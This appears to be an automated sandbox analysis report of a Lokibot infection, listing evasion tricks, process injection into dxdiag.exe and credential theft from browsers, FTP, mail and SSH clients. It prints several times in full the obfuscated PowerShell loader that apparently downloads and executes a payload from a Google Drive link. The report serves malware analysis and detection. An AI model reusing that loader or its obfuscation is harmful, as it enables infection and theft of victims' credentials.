Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\dxdiag.exe

API/Special instruction interceptor: Address: 474C1C7

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4677	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5135	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6679	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3015	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Window / User API: threadDelayed 4854	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1600	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2636	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe TID: 1892	Thread sleep count: 4854 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe TID: 5248	Thread sleep time: -60000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\dxdiag.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\dxdiag.exe	Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Windows\SysWOW64\dxdiag.exe

Thread sleep count: Count: 4854 delay: -5

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.0000000006024000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2226848933.000001F3C89A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_0301D508 LdrInitializeThunk,LdrInitializeThunk,

4_2_0301D508

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7156.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 2A00000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 270FDE8			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#linnas kandidtwr overskyet ecdysial hjlandene providentialism selekteringer #>;$rystelses='makeress';<#plungy firdobling preferrers aftvingende encoders hardier forsvarschefernes #>;$hvsnings=$host.privatedata;if ($hvsnings) {$narrishkeit++;}function atomangreb($antipapistical246){$bondske=$fremmeligst+$antipapistical246.length-$narrishkeit;for( $halfheartednesses=5;$halfheartednesses -lt $bondske;$halfheartednesses+=6){$minkfarven+=$antipapistical246[$halfheartednesses];}$minkfarven;}function rme($stillehavsflaadernes){ . ($posthume) ($stillehavsflaadernes);}$gulvmaattens=atomangreb 'spinamb ugeosade zskyldid.rivltsarelpartea hexi/ uror5angin. prod0a.tin manom(skonnwmyoepibarsen migodunaudo sulfwsnv.es lati kons nbaan.tiniti kldni1regis0bolig.kirop0opsam; civi antyw pub ivir,lnwid.w6rance4 igna;alene a,tabxreemk6crabb4speci;handl irettral,miv budg:midda1colpe2n dbr1bombe. hosl0under)ambit subelgrenteeu eldcvalthkmeethohyper/in,ho2 dune0 etnk1 list0 medb0nark 1subef0alder1 onr wicksfvaginitwi.trb rguephanefsci,soenga,xvandl/gstel1 umsk2 feri1skaks.,inkl0 lge ';$librettoens=atomangreb ' alibu tea,s circesui trbegav- geopa storginhomeia.hingarrutdisge ';$broderierne=atomangreb 'dimplhantietdistitgastepb,nusskrake:ungdo/funkt/over.d b llr selviafd,ivr vieeafkri.drogsg reklobidraobe,vegin.mulmarkser,gnf.figetctuberofamldm tang/.asteubev.dcp eud?lammieworkuxudsk.pdunbaotilm rrehant p lm=unuandcaddiomaskiwkinemnvbnenldelsao snivaatolldtegni&alumrism gsdbendi= paal1 uriniindtjs recrl a acudrapezm.dermsilenfdataijlige 8su co9 dobbm knusoto fl5contofornam9ingenglingul tomhosko euzarisount,ul skdyyrefluvcanon7udtmtqadmetemos itunderw,avsprdividtfattirtransupalma ';$udviskning=atomangreb 'stose>nedfr ';$posthume=atomangreb 'bargiimarkoe skibx oso ';$cassina='kendetegner';$dentine='\smaalige.eks';rme (atomangreb 'rabat$noncog tap lnacroo enlsbe segapsychlstagn:antiso oodvbo ene alkarforbecpsa oogrundam rcet bire= dy,t$ .ispemedionvatikv orev:tr chapredapbarfop scled fraiamatert eskaavigil+bes,a$dem edb rmae andrnseawat oomsispi.nnproloeha de ');rme (atomangreb ' viva$pedotgdisselt rmkosairlb pretaflig.lclogg: klasuremain sregs uspet hoveu agidspa ei op,eereadodperp.nsaddueanke s,oextskommu=te,te$driveb urmart llgokarnedbioloevrlesrheterinons e,athiroleosninpute succ.illu.s phy p swi.lfusibiserpetekstr(a ous$anti,uunderdg udev,ndiui mprosunshak opmanorga itroopn j.ckgfarth)staal ');rme (atomangreb ',arak[ kortnpneumeso attskovb.skrmfsoverpegarnerenjoyvslowmibauxicu.eskebrndepundiso.ealiifladfn non ts,okimprvepasquifnportea gonogdemimeafspnrotten] rip :fagbl: mainsf emmekontrcbud rulektir knowi mldttto nfyshantpver er kammosymmet vo dofl.decstratostranlmodpa heter=mini brneb[drot n,erieeraah t.umle.forfrsfilosemyretcstjfruudlaargar libilbotspilly tartphock,repiclopapert s liotagkacfrsteo li,ilcoh,bt yanoy aurepbeclaetypec]prize:antnd
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#linnas kandidtwr overskyet ecdysial hjlandene providentialism selekteringer #>;$rystelses='makeress';<#plungy firdobling preferrers aftvingende encoders hardier forsvarschefernes #>;$hvsnings=$host.privatedata;if ($hvsnings) {$narrishkeit++;}function atomangreb($antipapistical246){$bondske=$fremmeligst+$antipapistical246.length-$narrishkeit;for( $halfheartednesses=5;$halfheartednesses -lt $bondske;$halfheartednesses+=6){$minkfarven+=$antipapistical246[$halfheartednesses];}$minkfarven;}function rme($stillehavsflaadernes){ . ($posthume) ($stillehavsflaadernes);}$gulvmaattens=atomangreb 'spinamb ugeosade zskyldid.rivltsarelpartea hexi/ uror5angin. prod0a.tin manom(skonnwmyoepibarsen migodunaudo sulfwsnv.es lati kons nbaan.tiniti kldni1regis0bolig.kirop0opsam; civi antyw pub ivir,lnwid.w6rance4 igna;alene a,tabxreemk6crabb4speci;handl irettral,miv budg:midda1colpe2n dbr1bombe. hosl0under)ambit subelgrenteeu eldcvalthkmeethohyper/in,ho2 dune0 etnk1 list0 medb0nark 1subef0alder1 onr wicksfvaginitwi.trb rguephanefsci,soenga,xvandl/gstel1 umsk2 feri1skaks.,inkl0 lge ';$librettoens=atomangreb ' alibu tea,s circesui trbegav- geopa storginhomeia.hingarrutdisge ';$broderierne=atomangreb 'dimplhantietdistitgastepb,nusskrake:ungdo/funkt/over.d b llr selviafd,ivr vieeafkri.drogsg reklobidraobe,vegin.mulmarkser,gnf.figetctuberofamldm tang/.asteubev.dcp eud?lammieworkuxudsk.pdunbaotilm rrehant p lm=unuandcaddiomaskiwkinemnvbnenldelsao snivaatolldtegni&alumrism gsdbendi= paal1 uriniindtjs recrl a acudrapezm.dermsilenfdataijlige 8su co9 dobbm knusoto fl5contofornam9ingenglingul tomhosko euzarisount,ul skdyyrefluvcanon7udtmtqadmetemos itunderw,avsprdividtfattirtransupalma ';$udviskning=atomangreb 'stose>nedfr ';$posthume=atomangreb 'bargiimarkoe skibx oso ';$cassina='kendetegner';$dentine='\smaalige.eks';rme (atomangreb 'rabat$noncog tap lnacroo enlsbe segapsychlstagn:antiso oodvbo ene alkarforbecpsa oogrundam rcet bire= dy,t$ .ispemedionvatikv orev:tr chapredapbarfop scled fraiamatert eskaavigil+bes,a$dem edb rmae andrnseawat oomsispi.nnproloeha de ');rme (atomangreb ' viva$pedotgdisselt rmkosairlb pretaflig.lclogg: klasuremain sregs uspet hoveu agidspa ei op,eereadodperp.nsaddueanke s,oextskommu=te,te$driveb urmart llgokarnedbioloevrlesrheterinons e,athiroleosninpute succ.illu.s phy p swi.lfusibiserpetekstr(a ous$anti,uunderdg udev,ndiui mprosunshak opmanorga itroopn j.ckgfarth)staal ');rme (atomangreb ',arak[ kortnpneumeso attskovb.skrmfsoverpegarnerenjoyvslowmibauxicu.eskebrndepundiso.ealiifladfn non ts,okimprvepasquifnportea gonogdemimeafspnrotten] rip :fagbl: mainsf emmekontrcbud rulektir knowi mldttto nfyshantpver er kammosymmet vo dofl.decstratostranlmodpa heter=mini brneb[drot n,erieeraah t.umle.forfrsfilosemyretcstjfruudlaargar libilbotspilly tartphock,repiclopapert s liotagkacfrsteo li,ilcoh,bt yanoy aurepbeclaetypec]prize:antnd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#linnas kandidtwr overskyet ecdysial hjlandene providentialism selekteringer #>;$rystelses='makeress';<#plungy firdobling preferrers aftvingende encoders hardier forsvarschefernes #>;$hvsnings=$host.privatedata;if ($hvsnings) {$narrishkeit++;}function atomangreb($antipapistical246){$bondske=$fremmeligst+$antipapistical246.length-$narrishkeit;for( $halfheartednesses=5;$halfheartednesses -lt $bondske;$halfheartednesses+=6){$minkfarven+=$antipapistical246[$halfheartednesses];}$minkfarven;}function rme($stillehavsflaadernes){ . ($posthume) ($stillehavsflaadernes);}$gulvmaattens=atomangreb 'spinamb ugeosade zskyldid.rivltsarelpartea hexi/ uror5angin. prod0a.tin manom(skonnwmyoepibarsen migodunaudo sulfwsnv.es lati kons nbaan.tiniti kldni1regis0bolig.kirop0opsam; civi antyw pub ivir,lnwid.w6rance4 igna;alene a,tabxreemk6crabb4speci;handl irettral,miv budg:midda1colpe2n dbr1bombe. hosl0under)ambit subelgrenteeu eldcvalthkmeethohyper/in,ho2 dune0 etnk1 list0 medb0nark 1subef0alder1 onr wicksfvaginitwi.trb rguephanefsci,soenga,xvandl/gstel1 umsk2 feri1skaks.,inkl0 lge ';$librettoens=atomangreb ' alibu tea,s circesui trbegav- geopa storginhomeia.hingarrutdisge ';$broderierne=atomangreb 'dimplhantietdistitgastepb,nusskrake:ungdo/funkt/over.d b llr selviafd,ivr vieeafkri.drogsg reklobidraobe,vegin.mulmarkser,gnf.figetctuberofamldm tang/.asteubev.dcp eud?lammieworkuxudsk.pdunbaotilm rrehant p lm=unuandcaddiomaskiwkinemnvbnenldelsao snivaatolldtegni&alumrism gsdbendi= paal1 uriniindtjs recrl a acudrapezm.dermsilenfdataijlige 8su co9 dobbm knusoto fl5contofornam9ingenglingul tomhosko euzarisount,ul skdyyrefluvcanon7udtmtqadmetemos itunderw,avsprdividtfattirtransupalma ';$udviskning=atomangreb 'stose>nedfr ';$posthume=atomangreb 'bargiimarkoe skibx oso ';$cassina='kendetegner';$dentine='\smaalige.eks';rme (atomangreb 'rabat$noncog tap lnacroo enlsbe segapsychlstagn:antiso oodvbo ene alkarforbecpsa oogrundam rcet bire= dy,t$ .ispemedionvatikv orev:tr chapredapbarfop scled fraiamatert eskaavigil+bes,a$dem edb rmae andrnseawat oomsispi.nnproloeha de ');rme (atomangreb ' viva$pedotgdisselt rmkosairlb pretaflig.lclogg: klasuremain sregs uspet hoveu agidspa ei op,eereadodperp.nsaddueanke s,oextskommu=te,te$driveb urmart llgokarnedbioloevrlesrheterinons e,athiroleosninpute succ.illu.s phy p swi.lfusibiserpetekstr(a ous$anti,uunderdg udev,ndiui mprosunshak opmanorga itroopn j.ckgfarth)staal ');rme (atomangreb ',arak[ kortnpneumeso attskovb.skrmfsoverpegarnerenjoyvslowmibauxicu.eskebrndepundiso.ealiifladfn non ts,okimprvepasquifnportea gonogdemimeafspnrotten] rip :fagbl: mainsf emmekontrcbud rulektir knowi mldttto nfyshantpver er kammosymmet vo dofl.decstratostranlmodpa heter=mini brneb[drot n,erieeraah t.umle.forfrsfilosemyretcstjfruudlaargar libilbotspilly tartphock,repiclopapert s liotagkacfrsteo li,ilcoh,bt yanoy aurepbeclaetypec]prize:antnd	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 1900, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\dxdiag.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\dxdiag.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\dxdiag.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 1900, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
